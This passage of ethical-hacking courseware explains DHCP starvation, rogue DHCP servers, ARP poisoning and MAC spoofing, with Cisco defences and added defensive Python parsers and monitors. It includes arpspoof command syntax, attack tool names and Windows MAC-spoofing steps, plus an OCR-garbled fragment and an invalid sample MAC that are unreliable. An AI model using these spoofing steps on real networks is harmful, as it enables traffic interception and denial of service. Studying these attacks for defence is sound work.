DHCP enables communication on an IP network by configuring network devices. It assigns IP addresses and other information to computers so that they can communicate on the network in the client-server mode. DHCP has two functionalities: delivering host-specific configuration parameters and allocating network addresses to hosts. A series of DHCP messages is used in communication between DHCP servers and DHCP clients. DHCP messages have the same format as that of Bootstrap Protocol (BOOTP) messages because DHCP maintains its compatibility with BOOTP relay agents, thus eliminating the need to change the BOOTP client's initialization software to interoperate with DHCP servers.

Figure 8.26: IPv4 DHCP packet format

The following table details every field of the IPv4 DHCP message:

FIELD                           | OCTETS   | DESCRIPTION
Opcode                          | 1        | This field contains the message opcode that represents the message type: opcode "1" represents messages sent by the client, while "2" represents responses sent by the server
Hardware Address Type           | 1        | Hardware address type defined at the Internet Assigned Numbers Authority (IANA) (e.g., "1" = 10Mb Ethernet)
Hardware Address Length         | 1        | Hardware address length in octets
Hops                            | 1        | DHCP clients optionally set the value to "0"; however, in general, the value is used to count the number of relay agents that forwarded the message
Transaction ID (XID)            | 4        | A random number chosen by the client to associate the request messages and their responses between a client and a server
Seconds elapsed                 | 2        | Seconds since the client began the address acquisition or renewal process
Flags                           | 2        | Flags set by the client; for example, if the client cannot receive unicast IP datagrams, then the broadcast flag is set
Client IP Address (CIADDR)      | 4        | Used when the client has an IP address and can respond to ARP requests
Your IP Address (YIADDR)        | 4        | The address assigned by the DHCP server to the DHCP client
Server IP Address (SIADDR)      | 4        | Server's IP address
Gateway IP Address (GIADDR)     | 4        | The IP address of the DHCP relay agent
Client Hardware Address (CHADDR)| 16       | The hardware address of the client
Server Name (SNAME)             | 64       | Optional server hostname
File Name                       | 128      | Name of the file containing the BOOTP client's boot image
DHCP Options                    | Variable | Optional parameters field

Table 8.9: Fields of the IPv4 DHCP message
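A parser for the fixed IPv4 DHCP header laid out in Table 8.9 and for the options field that follows it, as an added example that is not code from the courseware. The DHCPDISCOVER it parses is built in the same file from constructed values (the XID, the client MAC and the hostname are made up).

```python
"""Parser for the fixed IPv4 DHCP header (Table 8.9) and the options that follow it.

Added example, not code from the EC-Council courseware. The DHCPDISCOVER it
parses is built below from constructed values (XID, MAC, hostname).
"""
import struct

DHCP_MAGIC_COOKIE = b"\x63\x82\x53\x63"          # marks the start of the options field
# Field order and widths from Table 8.9: op, htype, hlen, hops, xid, secs, flags,
# ciaddr, yiaddr, siaddr, giaddr, chaddr(16), sname(64), file(128) = 236 octets
FIXED_FORMAT = "!BBBBIHH4s4s4s4s16s64s128s"
MESSAGE_TYPES = {1: "DHCPDISCOVER", 2: "DHCPOFFER", 3: "DHCPREQUEST", 4: "DHCPDECLINE",
                 5: "DHCPACK", 6: "DHCPNAK", 7: "DHCPRELEASE", 8: "DHCPINFORM"}


def _ip(raw):
    return ".".join(str(b) for b in raw)


def _cstring(raw):
    return raw.split(b"\0", 1)[0].decode("ascii", "replace")


def parse_dhcp(data):
    """Return (header dict, options dict keyed by option code) or raise ValueError."""
    if len(data) < 240 or data[236:240] != DHCP_MAGIC_COOKIE:
        raise ValueError("not a DHCP message: short packet or missing magic cookie")
    (op, htype, hlen, hops, xid, secs, flags, ciaddr, yiaddr, siaddr, giaddr,
     chaddr, sname, bootfile) = struct.unpack(FIXED_FORMAT, data[:236])
    header = {
        "op": {1: "BOOTREQUEST (client)", 2: "BOOTREPLY (server)"}.get(op, op),
        "htype": htype, "hlen": hlen, "hops": hops, "xid": xid, "secs": secs,
        "broadcast": bool(flags & 0x8000),        # client cannot receive unicast yet
        "ciaddr": _ip(ciaddr), "yiaddr": _ip(yiaddr),
        "siaddr": _ip(siaddr), "giaddr": _ip(giaddr),
        "chaddr": "-".join("%02x" % b for b in chaddr[:min(hlen, 16)]),
        "sname": _cstring(sname), "file": _cstring(bootfile),
    }
    options, i = {}, 240
    while i < len(data):
        code = data[i]
        if code == 255:                            # End option
            break
        if code == 0:                              # Pad option has no length octet
            i += 1
            continue
        if i + 1 >= len(data):
            raise ValueError("truncated option header at offset %d" % i)
        length = data[i + 1]
        value = data[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("option %d truncated" % code)
        options[code] = value
        i += 2 + length
    if 53 in options and len(options[53]) == 1:
        header["message_type"] = MESSAGE_TYPES.get(options[53][0], options[53][0])
    return header, options


def build_discover(xid, mac, hostname=b"lab-client"):
    """Constructed sample input: a client DHCPDISCOVER with the broadcast flag set."""
    chaddr = bytes.fromhex(mac.replace(":", "").replace("-", "")).ljust(16, b"\0")
    zero4 = b"\0" * 4
    fixed = struct.pack(FIXED_FORMAT, 1, 1, 6, 0, xid, 0, 0x8000,
                        zero4, zero4, zero4, zero4, chaddr, b"\0" * 64, b"\0" * 128)
    options = (bytes([53, 1, 1])                       # DHCP Message Type: DISCOVER
               + bytes([12, len(hostname)]) + hostname  # Host Name
               + bytes([55, 3, 1, 3, 6])                # Parameter Request List
               + bytes([255]))                          # End
    return fixed + DHCP_MAGIC_COOKIE + options


SAMPLE_DISCOVER = build_discover(0x3903F326, "02:1b:48:64:42:e4")   # constructed values

if __name__ == "__main__":
    hdr, opts = parse_dhcp(SAMPLE_DISCOVER)
    for key, value in hdr.items():
        print("%-13s %s" % (key, value))
    print("options:", sorted(opts))
```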

DHCP Starvation Attack

In a DHCP starvation attack, an attacker floods the DHCP server by sending numerous DHCP requests and uses all of the available IP addresses that the DHCP server can issue. As a result, the server cannot issue any more IP addresses, leading to a DoS attack. Because of this issue, valid users cannot obtain or renew their IP addresses; thus, they fail to access their network. An attacker broadcasts DHCP requests with spoofed MAC addresses with the help of tools such as

Figure 8.27: DHCP starvation attack

DHCP Starvation Attack Tools

DHCP starvation attack tools send a large number of requests to a DHCP server, leading to exhaustion of the server's address pool. Subsequently, the DHCP server is unable to allocate configurations to new clients.

- Yersinia
Source: https://sourceforge.net
Yersinia is a network tool designed to take advantage of weaknesses in different network protocols like DHCP. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. As shown in the screenshot, attackers use Yersinia to perform a DHCP starvation attack on the target system.

Figure 8.28: Screenshot of Yersinia

Some examples of DHCP starvation attack tools are listed below:
- Hyenae (https://sourceforge.net)
- dhcpstarv (https://github.com)
- Gobbler (https://sourceforge.net)
- DHCPig (https://github.com)

Rogue DHCP Server Attack

In addition to DHCP starvation attacks, an attacker can perform MITM attacks such as sniffing. An attacker who succeeds in exhausting the DHCP server's IP address space can set up a rogue DHCP server on the network, which is not under the control of the network administrator. The rogue DHCP server impersonates a legitimate server and offers IP addresses and other network information to other clients in the network, acting as a default gateway. Clients connected to the network with the addresses assigned by the rogue server will now become victims of MITM and other attacks, whereby packets forwarded from a client's machine will reach the rogue server first.

In a rogue DHCP server attack, an attacker will introduce a rogue server into the network. This rogue server can respond to clients' DHCP discovery requests. Although both the rogue and actual DHCP servers respond to the request, the client accepts the response that comes first. In the case where the rogue server responds earlier than the actual DHCP server, the client takes the response of the rogue server. The information provided to the clients by this rogue server can disrupt their network access, causing a DoS attack.

The DHCP response from the attacker's rogue DHCP server may assign the IP address that serves as a client's default gateway. As a result, the attacker's IP address receives all the traffic from the client. The attacker then captures all the traffic and forwards it to the appropriate default gateway. The client thinks that everything is functioning correctly. This type of attack is difficult for the client to detect for long periods.

Sometimes, the client uses a rogue DHCP server instead of the standard one. The rogue server directs the client to visit fake websites in an attempt to gain their credentials.

To mitigate a rogue DHCP server attack, set the connection between the interface and the rogue server as untrusted. This action will block all incoming DHCP server messages from that interface.

Figure 8.29: Rogue DHCP server attack

How to Defend Against DHCP Starvation and Rogue Server Attacks

Defend Against DHCP Starvation

Enable port security to defend against a DHCP starvation attack. Port security limits the maximum number of MAC addresses on the switch port. When the limit is exceeded, the switch drops subsequent MAC address requests (packets) from external sources, which safeguards the server against a DHCP starvation attack.

Figure 8.30: Defending against DHCP starvation attack

Internetwork Operating System (IOS) Switch Commands
Source: https://www.cisco.com
- switchport port-security
The switchport port-security command configures the switchport parameters to enable port security.

- switchport port-security maximum 1
The switchport port-security maximum command configures the maximum number of secure MAC addresses for the port. The switchport port-security maximum 1 command configures the maximum number of secure MAC addresses for the port as 1.
- switchport port-security violation restrict
The switchport port-security violation command sets the violation mode and the necessary action in case of detection of a security violation. The switchport port-security violation restrict command drops packets with unknown source addresses until a sufficient number of secure MAC addresses are removed.
- switchport port-security aging time 2
The switchport port-security aging time command configures the secure MAC address aging time on the port. The switchport port-security aging time 2 command sets the aging time as 2 minutes.
- switchport port-security aging type inactivity
The switchport port-security aging type command configures the secure MAC address aging type on the port. The switchport port-security aging type inactivity command sets the aging type as inactivity aging.
- switchport port-security mac-address sticky
This command enables sticky learning on the interface by entering only the mac-address sticky keywords. When sticky learning is enabled, the interface adds all secure MAC addresses that are dynamically learned to the running configuration and converts these addresses to sticky secure MAC addresses.
Defend Against Rogue Server Attack

The DHCP snooping feature that is available on switches can mitigate against rogue DHCP servers. It is configured on the port on which the valid DHCP server is connected. Once configured, DHCP snooping does not allow other ports on the switch to respond to DHCP Discover packets sent by clients. Thus, even an attacker who manages to build a rogue DHCP server and connects to the switch cannot respond to DHCP Discover packets.

Figure 8.31: Defending against rogue server attack
IOS Global Commands
Source: https://www.cisco.com
Steps to configure DHCP snooping:
1. ip dhcp snooping
Enables DHCP snooping globally.
2. ip dhcp snooping vlan number [number] | vlan {vlan range}
Enables or disables DHCP snooping on one or more VLANs. For example: ip dhcp snooping vlan 4,104
3. ip dhcp snooping trust
Configures the interface as trusted or untrusted.
4. ip dhcp snooping limit rate
Configures the number of DHCP packets per second (pps) that an interface can receive.
5. end
Exits configuration mode.
6. show ip dhcp snooping
Verifies the configuration.

Additional DHCP snooping command:
no ip dhcp snooping information option
To disable the insertion and the removal of the option-82 field, use the no ip dhcp snooping information option global configuration command. To configure an aggregation switch to drop incoming DHCP snooping packets with option-82 information from an edge switch, use the "no ip dhcp snooping information option allow-untrusted" global configuration command.
Note: All ports in the VLAN are untrusted by default.

Sniffing Technique: ARP Poisoning

This section discusses the ARP poisoning technique generally used by attackers to perform sniffing on a target network. Using this method, an attacker can steal sensitive information, prevent network and web access, and perform DoS and MITM attacks using sniffing.

What Is Address Resolution Protocol (ARP)?

Address Resolution Protocol (ARP) is a stateless TCP/IP protocol that maps IP network addresses to the addresses (hardware addresses) used by a data link protocol. Using this protocol, a user can easily obtain the MAC address of any device on a network. Apart from the switch, the host machines also use the ARP protocol for obtaining MAC addresses. ARP is used by the host machine when it wants to send a packet to another device and has to mention the destination MAC address in the packet. Therefore, to write the destination MAC address in the packet, the host machine should know the MAC address of the destination machine. The OS also maintains the MAC address table (ARP table).

The process of obtaining the MAC address using ARP is as follows:
- The source machine generates an ARP request packet containing the source MAC address, source IP address, and destination IP address, and sends it to the switch.
- On receiving the packet, the switch reads the MAC address of the source and searches for this address in its CAM table.
- The switch updates all the new entries in it. If the entry is not found in the table, the switch adds the MAC address and its respective incoming port to its CAM table and broadcasts the ARP request packet into the network.

- Each device in the network receives the broadcast ARP request packet and compares the destination IP address in the packet with its own IP address.
- Only the system with an IP address that matches the destination IP address replies with an ARP reply packet.
- The ARP reply message is then read by the switch, which adds the entry to its MAC table and forwards the message to the destination machine, i.e., the machine that sent the ARP request.
- Further, this machine updates the destination machine's IP and MAC address entries into its ARP table, and now communication can take place.

Figure 8.32: Working of ARP

Consider an ARP example that shows two machines connected in a network. The respective hostnames, IPs, and MAC addresses are:

Host Name | IP           | MAC
A         | 194.54.67.10 | 00:1b:48:64:42:e4
B         | 192.54.67.15 | 00-14-20-01-23-47
Before communicating with host B, host A first checks for a record of host B's MAC address in the ARP cache. If host A finds the record of the MAC address, it communicates directly with host B. Otherwise, it has to access host B's MAC address using the ARP protocol.

Host A queries all the hosts on the LAN. If the query were phrased in plain English, it might sound like this: "Hello, who is 192.54.67.15? This is 194.54.67.10. My MAC address is 00:1b:48:64:42:e4. I need your MAC address." Here, host A sends a broadcast request data packet to host B. On receiving the ARP request packet, host B updates its ARP cache table with host A's IP and MAC addresses, and sends an ARP reply packet to host A that would be phrased in English as, "Hey, this is 192.54.67.15; my MAC address is 00-14-20-01-23-47."

On receiving the ARP reply, host A updates its ARP cache table with host B's IP and MAC addresses. After establishing a connection, these two hosts can communicate with each other.

Figure 8.33: ARP cache

ARP Spoofing Attack

ARP resolves IP addresses to the MAC (hardware) address of the interface to send data. ARP packets can be forged to send data to the attacker's machine. ARP spoofing involves constructing a large number of forged ARP request and reply packets to overload a switch. When a machine sends an ARP request, it assumes that the ARP reply will come from the right machine. ARP provides no means of verifying the authenticity of the responding device. Even systems that have not made an ARP request can accept the ARP replies coming from other devices. Attackers use this flaw in ARP to create malformed ARP replies containing spoofed IP and MAC addresses. Assuming it to be the legitimate ARP reply, the victim's computer blindly accepts the ARP entry into its ARP table. Once the ARP table is flooded with spoofed ARP replies, the switch is set in forwarding mode, and the attacker intercepts all the data that flows from the victim's machine without the victim being aware of the attack. Attackers flood a target computer's ARP cache with forged entries, which is also known as poisoning. ARP spoofing is an intermediary for performing attacks such as DoS, MITM, and session hijacking.
How does ARP Spoofing Work?

ARP spoofing is a method of attacking an Ethernet LAN. When a legitimate user initiates a session with another user in the same layer 2 broadcast domain, the switch broadcasts an ARP request using the recipient's IP address, while the sender waits for the recipient to respond with a MAC address. An attacker eavesdropping on this unprotected layer 2 broadcast domain can respond to the broadcast ARP request and replies to the sender by spoofing the intended recipient's IP address. The attacker runs a sniffer and turns the machine's NIC adapter to promiscuous mode.

ARP spoofing is a method of attacking an Ethernet LAN. It succeeds by changing the IP address of the attacker's computer to that of the target computer. A forged ARP request and reply packet can find a place in the target ARP cache in this process. As the ARP reply has been forged, the destination computer (target) sends frames to the attacker's computer, where the attacker can modify the frames before sending them to the source machine (User A) in an MITM attack. The attacker can also launch a DoS attack by associating a non-existent MAC address to the IP address of the gateway; alternatively, the attacker may sniff the traffic passively and then forward it to the target destination.

Figure 8.34: Working of an ARP spoofing attack

Threats of ARP Poisoning
With the help of ARP poisoning, an attacker can use fake ARP messages to divert all communications between two machines so that all traffic redirects via the attacker's PC.

The threats of ARP poisoning include:
- Packet Sniffing: Sniffs traffic over a network or a part of the network.
- Session Hijacking: Steals valid session information and uses it to gain unauthorized access to an application.
- VoIP Call Tapping: Uses port mirroring, which allows the VoIP call tapping unit to monitor all network traffic, and picks only the VoIP traffic to record by MAC address.
- Manipulating Data: ARP spoofing allows attackers to capture and modify data, or stops the flow of traffic.
- Man-in-the-Middle Attack: An attacker performs a MITM attack where they reside between the victim and server.
- Data Interception: Intercepts IP addresses, MAC addresses, and VLANs connected to the switch in a network.
- Connection Hijacking: In a network, the hardware addresses are supposed to be unique and fixed, but a host may move when its hostname changes and use another protocol. In connection hijacking, an attacker can manipulate a client's connection to take complete control.
- Connection Resetting: The wrong routing information could be transmitted due to a hardware/software error. In such cases, if a host fails to initiate a connection, that host should inform the Address Resolution module to delete its information. The reception of data from that host will reset a connection timeout in the ARP entry used to transmit data to that host. This entry in the ARP module is deleted if the host does not send any information for a certain period of time.
- Stealing Passwords: An attacker uses forged ARP replies and tricks target hosts into sending sensitive information such as usernames and passwords.
- DoS Attack: Links multiple IP addresses with a single MAC address of the target host that is intended for different IP addresses, which will be overloaded with a huge amount of traffic.

ARP Poisoning Tools
- arpspoof
Source: https://linux.die.net
arpspoof redirects packets from a target host (or all hosts) on the LAN intended for another host on the LAN by forging ARP replies. This is an extremely effective way of sniffing traffic on a switch.
Syntax: arpspoof -i [Interface] -t [TargetHost]
As shown in the screenshot, attackers use the arpspoof tool to obtain the ARP cache; then, the MAC address is replaced with that of an attacker's system. Therefore, any traffic flowing from the victim to the gateway will be redirected to the attacker's system. Further, an attacker can issue the same command in reverse as he/she is in the middle and can send ARP replies in both directions.

ical andCountermensores
Mackin ©by E-Comel
Copyright
the of
stacers
laced
witht
tem

Someexamples
of
Figure35:Screenshotrppoot
of ARPpoisoning toolsare listedbelow.
+
BetterCAP(https://www.bettercap.org)
+
(hitp://www.ettercap-project.ora)
Ettercap
dsr (https://www.monkey.org)
MITME(https://github.com)
(https://sourceforge.net)
Arpoison

Module
8 1122
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
How to Defend Against ARP Poisoning

Implement Dynamic ARP Inspection Using DHCP Snooping Binding Table

Implementation of Dynamic ARP Inspection (DAI) prevents ARP poisoning attacks. DAI is a security feature that validates ARP packets in a network. When DAI activates on a VLAN, all ports on the VLAN are considered to be untrusted by default. DAI validates the ARP packets using a DHCP snooping binding table. The DHCP snooping binding table consists of MAC addresses, IP addresses, and VLAN interfaces acquired by listening to DHCP message exchanges. Hence, you must enable DHCP snooping before enabling DAI. Otherwise, establishing a connection between VLAN devices based on ARP is not possible. Consequently, a self-imposed DoS may result on any device in that VLAN.

To validate the ARP packet, the DAI performs IP-address-to-MAC-address binding inspection stored in the DHCP snooping database before forwarding the packet to its destination. If an ARP packet carries an invalid IP-to-MAC address binding, the DAI will discard it. This eliminates the risk of MITM attacks. DAI ensures the relay of only valid ARP requests and responses.

If the host systems in a network hold static IP addresses, DHCP snooping will not be possible, or other switches in the network cannot run dynamic ARP inspection. In such situations, you have to perform static mapping that associates an IP address to a MAC address on a VLAN to prevent an ARP poisoning attack.

Software can be implemented that runs custom scripts to monitor ARP tables. This script can compare the current ARP table to the list of known MAC and IP addresses. If there is a mismatch in the list of valid MAC/IP pairs, the switch will drop the packet. Such scripts are helpful in defending against ARP poisoning attacks by monitoring the MAC/IP pairs on important LAN machines such as servers and gateways.
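A host-side script of the kind described above, written as an added example (not part of the courseware): it parses Linux `ip neigh` output, compares the gateway and server entries with a baseline of known MAC/IP pairs, and also flags one MAC address claimed by several IPs, the pattern described under the DoS bullet. The baseline, interface name and sample output are constructed for illustration.

```python
"""Host-side ARP table monitor: compares the live neighbour table with a
baseline of known MAC/IP pairs for critical hosts (gateway, servers).
Added example, not part of the courseware; the baseline, interface name and
the sample `ip neigh` output are constructed for illustration."""
import re
from collections import defaultdict

# Baseline of IP -> expected MAC for hosts worth protecting (constructed).
KNOWN_PAIRS = {
    "10.10.10.1": "00:11:22:33:44:01",   # default gateway
    "10.10.10.20": "00:11:22:33:44:20",  # file server
}

# Constructed sample of `ip neigh show` output on Linux; the gateway's MAC
# has been replaced by the MAC already used by 10.10.10.77.
SAMPLE_IP_NEIGH = """\
10.10.10.1 dev eth0 lladdr aa:bb:cc:dd:ee:77 REACHABLE
10.10.10.20 dev eth0 lladdr 00:11:22:33:44:20 STALE
10.10.10.77 dev eth0 lladdr aa:bb:cc:dd:ee:77 REACHABLE
10.10.10.99 dev eth0 FAILED
"""

NEIGH_RE = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9a-f:]{17}) (\S+)$", re.I)


def parse_ip_neigh(text):
    """Return {ip: mac} for entries that carry a link-layer address.
    Entries without lladdr (FAILED/INCOMPLETE) hold no binding and are skipped."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            ip, _dev, mac, _state = m.groups()
            table[ip] = mac.lower()
    return table


def check_arp_table(table, known=KNOWN_PAIRS):
    """Return a list of findings. Two signs of ARP poisoning are reported:
    a protected IP whose MAC differs from the baseline, and one MAC claimed
    by several IP addresses."""
    findings = []
    for ip, expected in known.items():
        seen = table.get(ip)
        if seen is None:
            findings.append(("missing", ip, expected, None))
        elif seen != expected.lower():
            findings.append(("mismatch", ip, expected, seen))
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(("duplicate-mac", mac, None, sorted(ips)))
    return findings


if __name__ == "__main__":
    # On a live host: table = parse_ip_neigh(subprocess.check_output(["ip", "neigh"], text=True))
    for finding in check_arp_table(parse_ip_neigh(SAMPLE_IP_NEIGH)):
        print(finding)
```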
The implementation of cryptographic protocols such as HTTP Secure (HTTPS), Secure Shell (SSH), Transport Layer Security (TLS), and various other networking cryptographic protocols prevents ARP spoofing attacks by encrypting data before transmission and authenticating it after it is received.

Figure 8.36: Defending against ARP poisoning
Configuring DHCP Snooping and Dynamic ARP Inspection on Cisco Switches

As discussed, DHCP snooping must be enabled before enabling DAI. DHCP snooping is a security feature that builds and maintains a DHCP snooping binding table and filters untrusted DHCP messages. A Cisco switch with DHCP snooping enabled can inspect the DHCP traffic flow at a layer 2 segment and track IP addresses to switch port mapping.

To configure DHCP snooping on a Cisco switch, ensure DHCP snooping is enabled both globally and per access VLAN. To enable DHCP snooping, execute the following commands:

Configuring DHCP snooping in global configuration mode
Switch(config)# ip dhcp snooping

Configuring DHCP snooping for a VLAN
Switch(config)# ip dhcp snooping vlan 10
Switch(config)# ^Z

To view the DHCP snooping status
Switch# show ip dhcp snooping
Switch DHCP snooping is enabled
DHCP snooping is configured on following VLANs: 10
DHCP snooping is operational on following VLANs: 10
DHCP snooping is configured on the following L3 Interfaces:

DHCP snooping trust/rate is configured on the following Interfaces:

Interface        Trusted    Rate limit (pps)

If the switch is functioning only at layer 2, apply the ip dhcp snooping trust command to the layer 2 uplink interfaces to designate them as trusted interfaces. This informs the switch that DHCP responses can arrive on those interfaces.

The DHCP snooping binding table contains the trusted DHCP clients and their respective IP addresses. To view the DHCP snooping table, you have to execute the following command:
Switch(config)# show ip dhcp snooping binding

This displays the DHCP snooping table, which contains the MAC addresses, respective IP addresses, and total number of bindings. The following is an example of a DHCP snooping binding table:

MacAddress          IpAddress     Lease(sec)  Type           VLAN  Interface
ta:12:3b:2f:de:1e   10.10.10.8    125864      dhcp-snooping  4     FastEthernet0/3
Total number of bindings: 1

After establishing a DHCP snooping binding table, the user can start configuring DAI for the VLAN. To enable DAI for multiple VLANs, specify a range of VLAN numbers.

Command to configure ARP inspection for a VLAN
Switch(config)# ip arp inspection vlan 10
Switch(config)# ^Z

Command to configure ARP inspection for a range of VLANs
Switch(config)# ip arp inspection vlan 10,11,12,13
or
Switch(config)# ip arp inspection vlan 10-13

To view the ARP inspection status
Switch(config)# show ip arp inspection

Source Mac Validation      : Disabled
Destination Mac Validation : Disabled
IP Address Validation      : Disabled

Vlan   Configuration   Operation   ACL Match   Static ACL
10     Enabled         Active

Vlan   ACL Logging   DHCP Logging   Probe Logging
10     Deny          Deny           Off

Vlan   Forwarded   Dropped   DHCP Drops   ACL Drops
10     0           0         0            0

Vlan   DHCP Permits   ACL Permits   Probe Permits   Source MAC Failures
10     0              0             0               0

Vlan   Dest MAC Failures   IP Validation Failures   Invalid Protocol Data
10     0                   0                        0

From this IP ARP inspection result, it is clear that the source MAC, destination MAC, and IP address validations are disabled. Even more security can be attained by enabling one or more of these additional validation checks. To do so, execute the command ip arp inspection validate followed by the address type.

Assume that an attacker with the source IP address 192.168.10.1 connects to VLAN 10 on interface FastEthernet0/5 and sends ARP replies, pretending to be the default router for the subnet in an attempt to initiate an MITM attack. The switch with DAI enabled inspects these reply packets by comparing them with the DHCP snooping table. The switch then tries to find an entry for the source IP address 192.168.10.1 on port FastEthernet0/5. If there is no entry, then the switch discards these packets.

%SW_DAI-4-DHCP_SNOOPING_DENY: 1 Invalid ARPs (Res) on Fa0/5, vlan 10.([0013.6050.acf4/192.168.10.1/ffff.ffff.ffff/192.168.10.1/05:37:31 UTC Mon Jul 08 2019])

If the discarding of packets starts, then the drop count begins to increase. You can see this increase in the drop count in the DAI output. To see the output, execute the command show ip arp inspection.

Switch(config)# show ip arp inspection

Source Mac Validation      : Disabled
Destination Mac Validation : Disabled
IP Address Validation      : Disabled

Vlan   Configuration   Operation   ACL Match   Static ACL
10     Enabled         Active

Vlan   ACL Logging   DHCP Logging   Probe Logging
10     Deny          Deny           Off

Vlan   Forwarded   Dropped   DHCP Drops   ACL Drops
10     30          5         5            0

Vlan   DHCP Permits   ACL Permits   Probe Permits   Source MAC Failures
10     30             0             0               0

Vlan   Dest MAC Failures   IP Validation Failures   Invalid Protocol Data
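The decision DAI makes for each ARP packet, written out as an added example (not Cisco's code and not from the courseware): packets on trusted ports pass, packets on untrusted ports must match a binding for their VLAN, the optional src-mac and ip validations can be switched on, and the per-VLAN counters and the DHCP_SNOOPING_DENY log line mirror the output shown above. The binding table, port names and packets are constructed.

```python
"""Model of what DAI does with an ARP packet that arrives on an untrusted port:
the sender IP/MAC pair is looked up in the DHCP snooping binding table for that
VLAN, and the packet is forwarded or dropped while per-VLAN counters like those
in `show ip arp inspection` are updated. Added example, not Cisco's
implementation; the bindings, port names and packets are constructed."""
from dataclasses import dataclass
from ipaddress import ip_address


@dataclass(frozen=True)
class Binding:          # one row of the DHCP snooping binding table
    mac: str
    ip: str
    vlan: int


@dataclass
class ArpPacket:
    port: str           # ingress interface
    vlan: int
    eth_src: str        # Ethernet source MAC
    sender_mac: str     # ARP sender hardware address
    sender_ip: str      # ARP sender protocol address
    target_mac: str
    target_ip: str
    is_reply: bool


@dataclass
class VlanCounters:     # the columns the show output reports per VLAN
    forwarded: int = 0
    dropped: int = 0
    dhcp_drops: int = 0
    dhcp_permits: int = 0
    src_mac_failures: int = 0
    ip_validation_failures: int = 0


class Dai:
    def __init__(self, bindings, trusted_ports=(), validate=()):
        # Bindings are looked up by (VLAN, IP) and must name the same MAC.
        self.table = {(b.vlan, b.ip): b.mac.lower() for b in bindings}
        self.trusted = set(trusted_ports)
        # Optional checks, off by default like "ip arp inspection validate": {"src-mac", "ip"}
        self.validate = set(validate)
        self.counters = {}
        self.log = []

    def _counters(self, vlan):
        return self.counters.setdefault(vlan, VlanCounters())

    def inspect(self, pkt, when="05:37:31 UTC Mon Jul 08 2019"):
        """Return 'forwarded' or 'dropped' for one ARP packet."""
        c = self._counters(pkt.vlan)
        if pkt.port in self.trusted:        # trusted ports (uplinks) bypass inspection
            c.forwarded += 1
            return "forwarded"
        if "src-mac" in self.validate and pkt.eth_src.lower() != pkt.sender_mac.lower():
            c.src_mac_failures += 1
            c.dropped += 1
            return "dropped"
        if "ip" in self.validate and not self._plausible_ip(pkt.sender_ip):
            c.ip_validation_failures += 1
            c.dropped += 1
            return "dropped"
        # Core check: the sender IP must be bound to the sender MAC in this VLAN.
        if self.table.get((pkt.vlan, pkt.sender_ip)) == pkt.sender_mac.lower():
            c.dhcp_permits += 1
            c.forwarded += 1
            return "forwarded"
        c.dhcp_drops += 1
        c.dropped += 1
        kind = "Res" if pkt.is_reply else "Req"
        self.log.append(
            f"%SW_DAI-4-DHCP_SNOOPING_DENY: 1 Invalid ARPs ({kind}) on {pkt.port}, "
            f"vlan {pkt.vlan}.([{pkt.sender_mac}/{pkt.sender_ip}/{pkt.target_mac}/"
            f"{pkt.target_ip}/{when}])")
        return "dropped"

    @staticmethod
    def _plausible_ip(ip):
        a = ip_address(ip)
        return not (a.is_unspecified or a.is_multicast or ip == "255.255.255.255")


if __name__ == "__main__":
    dai = Dai([Binding("0011.2233.4450", "192.168.10.50", 10)], trusted_ports={"Gi0/1"})
    # A real client answering from its own binding, then a host on Fa0/5 claiming
    # the router's address 192.168.10.1 although no binding exists for it.
    dai.inspect(ArpPacket("Fa0/3", 10, "0011.2233.4450", "0011.2233.4450", "192.168.10.50",
                          "ffff.ffff.ffff", "192.168.10.1", True))
    dai.inspect(ArpPacket("Fa0/5", 10, "0013.6050.acf4", "0013.6050.acf4", "192.168.10.1",
                          "ffff.ffff.ffff", "192.168.10.1", True))
    print(dai.counters[10])
    print("\n".join(dai.log))
```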

ARP Spoofing Detection Tools

- XArp
Source: http://www.xarp.net
XArp is a security application that detects ARP-based attacks. It detects critical network attacks that firewalls cannot cover. It uses advanced techniques to detect ARP attacks like ARP spoofing. The detection mechanism relies on two techniques: inspection modules and discoverers. Inspection modules look at ARP packets and check their correctness and validity concerning the databases they have built up. Discoverers actively validate IP-MAC mappings and actively detect attackers. The mechanism detects ARP attacks and keeps data private. It even monitors whole subnets for ARP attacks. This application screens the whole subnet for ARP attacks using different security levels and fine-tuning possibilities. A local network that is subject to ARP attacks inspects every ARP packet and reports attacks against remote machines.

As shown in the screenshot, security professionals use XArp to detect ARP spoofing attacks performed on the systems.

Figure 8.37: Screenshot of XArp

Some examples of ARP spoofing detection tools are listed below:
- Capsa Network Analyzer (https://www.colasoft.com)
- ArpON (https://sourceforge.net)
- ARP AntiSpoofer (https://sourceforge.net)
- ARPStraw (https://github.com)
- shARP (https://github.com)
Sniffing Technique: Spoofing Attacks

Besides ARP spoofing, an attacker can also use MAC spoofing, IRDP spoofing, VLAN hopping, and STP attacks to sniff the traffic of a target network. This section describes spoofing techniques that help attackers to steal sensitive information. This section also explains how to defend against MAC spoofing, VLAN hopping, and STP attacks.

MAC Spoofing/Duplicating

MAC duplicating refers to spoofing a MAC address with the MAC address of a legitimate user on the network. A MAC duplicating attack involves sniffing a network for MAC addresses of legitimate clients connected to the network. In this attack, the attacker first retrieves the MAC addresses of clients who are actively associated with the switch port. Then, the attacker spoofs a MAC address with the MAC address of the legitimate client. If the spoofing is successful, then the attacker can receive all the traffic destined for the client. Thus, an attacker can gain access to the network and take over the identity of someone on the network.

The diagram shows how an attacker performs a MAC spoofing/duplicating attack.

Figure 8.38: MAC spoofing/duplicating attack

Note: This technique can be used to bypass wireless access points' MAC filtering.
MAC Spoofing Technique: Windows

There are two methods for MAC spoofing in Windows 10 OS:

Method 1: If the network interface card supports clone MAC address, then follow these steps:
1. Click on Start, search for Control Panel and open it, then navigate to Network and Internet > Networking and Sharing Center.
2. Click on Ethernet and then click on Properties in the Ethernet Status window.
3. In the Ethernet Properties window, click on the Configure button and then on the Advanced tab.
4. Under the "Property" section, browse for Network Address and click on it.
5. On the right-hand side, under "Value," type in the new MAC address number you would like to assign and click OK.
Note: Enter the MAC address without ":" in between.
6. Type "ipconfig/all" or "net config rdr" in the command prompt to verify the changes.
7. If the changes are visible, then reboot the system, or else try method 2 (change MAC address in the registry).

Figure 8.39: Ethernet Properties dialog box

Method 2: Steps to change the MAC address in the registry
